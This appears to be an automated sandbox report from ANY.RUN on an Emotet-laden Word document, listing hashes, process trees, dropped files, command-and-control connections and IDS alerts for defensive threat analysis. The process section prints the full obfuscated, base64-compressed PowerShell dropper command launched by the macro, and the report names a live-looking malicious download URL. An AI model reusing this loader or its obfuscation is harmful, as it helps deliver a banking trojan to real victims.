analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FORM-1473289608752921.doc

Full analysis: https://app.any.run/tasks/e9a91c52-110f-44cb-909c-dbd5c2c02984
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 19:52:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Hudson-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 16:04:00 2018, Last Saved Time/Date: Thu Nov 8 16:04:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

F3D60EC0D27DDD8478358B2DA582C0A0

SHA1:

071E4BC4F43E53DD4492DC966D116AFB2445B886

SHA256:

C1B4468828553106702BBBFB0CCB8C78A293C701408BEE39CCCC464D311794A7

SSDEEP:

768:DXirRkVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o94GYGerHihX51CLW:j4Rkocn1kp59gxBK85fBt+a9tkTiLI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 673.exe (PID: 1612)
      • 673.exe (PID: 2040)
      • lpiograd.exe (PID: 3576)
      • lpiograd.exe (PID: 856)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3624)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3624)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1112)
    • Emotet process was detected

      • lpiograd.exe (PID: 856)
    • EMOTET was detected

      • lpiograd.exe (PID: 3576)
    • Connects to CnC server

      • lpiograd.exe (PID: 3576)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 2892)
    • Executable content was dropped or overwritten

      • 673.exe (PID: 1612)
      • powershell.exe (PID: 1112)
    • Creates files in the user directory

      • powershell.exe (PID: 1112)
    • Starts itself from another location

      • 673.exe (PID: 1612)
    • Application launched itself

      • lpiograd.exe (PID: 856)
    • Connects to unusual port

      • lpiograd.exe (PID: 3576)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3624)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3624)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 16:04:00
CreateDate: 2018:11:08 16:04:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Hudson-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 673.exe no specs 673.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
3624"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FORM-1473289608752921.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2892CMD c:\wINDOWs\SySteM32\cMd.eXE /c"seT oDB= ( NeW-ObjECT IO.COMPresSioN.DeFLatEStREAm( [Io.MemoRysTreAm] [cONvErt]::fROMbASE64sTRIng( 'NZDLbsIwEEV/JYtIBlHsPmipiCLxLEJCbLpg042dTBI3xnZtJyag/HsTWrYz554Z3VBtWSzBjxX7hsQFB3D4CGwlOEgXhVb7GBXO6RkhBQidgi0zfgaDE3Ui5akujzs9/wey5sJLiivJtcK2JCl1lOSgCM07GfG0fiY1N5Ul++N2YlN3DwqwTFVJAdb0Z29uoXLLHZCnxiWXbCNWhzvtvceQMW4YFzm3tKF/35iFFz96eseYMjnYsTa8M5qKrOlEm8fXZfOO8KcW3A3QHA2jkKcyiAP0Nn1BUbi/LOMQZD1zcNIj9IVG/X6EMJwBRZkyQJNiEC42NuAy6OsZXp1prmFXI14rL4Wi6QcXcGMegl44jHayViWMd530NolY5ymjNqEuKa5t+ws=' ) , [SYstEm.Io.coMpResSioN.cOMPrEsSIONmOde]::deCOMprEsS) ^| % { NeW-ObjECT sYsTEM.iO.StReaMReaDeR( $_ ,[Text.EnCoDINg]::aSCiI )} ^|%{ $_.rEadtOEnD( ) })^|^&((get-VariABlE '*MDR*').nAME[3,11,2]-join'')&& POwErSheLL Set-ITem (\"VAriAB\" +\"Le:zl\" + \"AH\" + \"3g\") ( [tYPE]( \"{0}{3}{1}{2}\"-F'En','RoN','menT','vi' ) ) ;( ^&( \"{0}{1}\" -f'D','IR') (\"{3}{1}{2}{4}{0}\"-f 'oncONtext','R','i','va','ablE:exECuti' )).\"vAL`UE\".\"InV`OKE`COMMA`Nd\".(\"{2}{0}{1}\"-f 'voKEsC','RIPT','IN' ).Invoke( ( ${z`lAh3g}::( \"{5}{0}{4}{3}{6}{2}{1}\" -f 'eT','LE','tVARIAb','e','eNvIrOnm','g','N' ).Invoke('oDB',(\"{1}{2}{0}\" -f 'Ss','Pro','CE' ))))" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1112POwErSheLL Set-ITem (\"VAriAB\" +\"Le:zl\" + \"AH\" + \"3g\") ( [tYPE]( \"{0}{3}{1}{2}\"-F'En','RoN','menT','vi' ) ) ;( &( \"{0}{1}\" -f'D','IR') (\"{3}{1}{2}{4}{0}\"-f 'oncONtext','R','i','va','ablE:exECuti' )).\"vAL`UE\".\"InV`OKE`COMMA`Nd\".(\"{2}{0}{1}\"-f 'voKEsC','RIPT','IN' ).Invoke( ( ${z`lAh3g}::( \"{5}{0}{4}{3}{6}{2}{1}\" -f 'eT','LE','tVARIAb','e','eNvIrOnm','g','N' ).Invoke('oDB',(\"{1}{2}{0}\" -f 'Ss','Pro','CE' ))))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2040"C:\Users\admin\AppData\Local\Temp\673.exe" C:\Users\admin\AppData\Local\Temp\673.exepowershell.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
1612"C:\Users\admin\AppData\Local\Temp\673.exe"C:\Users\admin\AppData\Local\Temp\673.exe
673.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
856"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
673.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
3576"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Version:
1, 4, 2, 50
Total events
1 672
Read events
1 259
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2FB6.tmp.cvr
MD5:
SHA256:
1112powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\47TQCCR8YZ8ABCNMDF8X.temp
MD5:
SHA256:
3624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$RM-1473289608752921.docpgc
MD5:44C918A0083F10E763FC6B284EB7FA98
SHA256:294B3E0E74EABBD860176F4AC5E9C18E66B2D1BFB652FAD2F2C978B9ACA1D5DF
3624WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1178BF800A7E9A315A240C34A220AC74
SHA256:D9C88E977D14F6A961A1118B14A375E85A2D6FC2467D14A13161D3D2EBF0E8B7
1612673.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:1B11AA2A09F5D922CC8DEFEF05C69FE9
SHA256:616084AF06E1D2AF84097716846A1CEBAC58FBD3A2F078EBECC0843E5E039BB6
1112powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
1112powershell.exeC:\Users\admin\AppData\Local\Temp\673.exeexecutable
MD5:1B11AA2A09F5D922CC8DEFEF05C69FE9
SHA256:616084AF06E1D2AF84097716846A1CEBAC58FBD3A2F078EBECC0843E5E039BB6
1112powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183870.TMPbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3576
lpiograd.exe
GET
70.60.50.60:8080
http://70.60.50.60:8080/
US
malicious
3576
lpiograd.exe
GET
187.163.174.149:8080
http://187.163.174.149:8080/
MX
malicious
3576
lpiograd.exe
GET
207.255.59.231:443
http://207.255.59.231:443/
US
malicious
1112
powershell.exe
GET
200
185.10.73.233:80
http://helpdeskfixer.com/kmvkWIp/
IR
executable
148 Kb
malicious
1112
powershell.exe
GET
301
185.10.73.233:80
http://helpdeskfixer.com/kmvkWIp
IR
html
241 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3576
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious
3576
lpiograd.exe
50.21.147.8:8090
Otelco Telephone, LLC
US
malicious
1112
powershell.exe
185.10.73.233:80
helpdeskfixer.com
Roshangar Rayaneh Tehran Co. Ltd.
IR
malicious
3576
lpiograd.exe
207.255.59.231:443
Atlantic Broadband Finance, LLC
US
malicious
3576
lpiograd.exe
70.60.50.60:8080
Time Warner Cable Internet LLC
US
malicious

DNS requests

Domain
IP
Reputation
helpdeskfixer.com
  • 185.10.73.233
malicious

Threats

PID
Process
Class
Message
1112
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
1112
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1112
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1112
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3576
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3576
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3576
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3 ETPRO signatures available at the full report
No debug info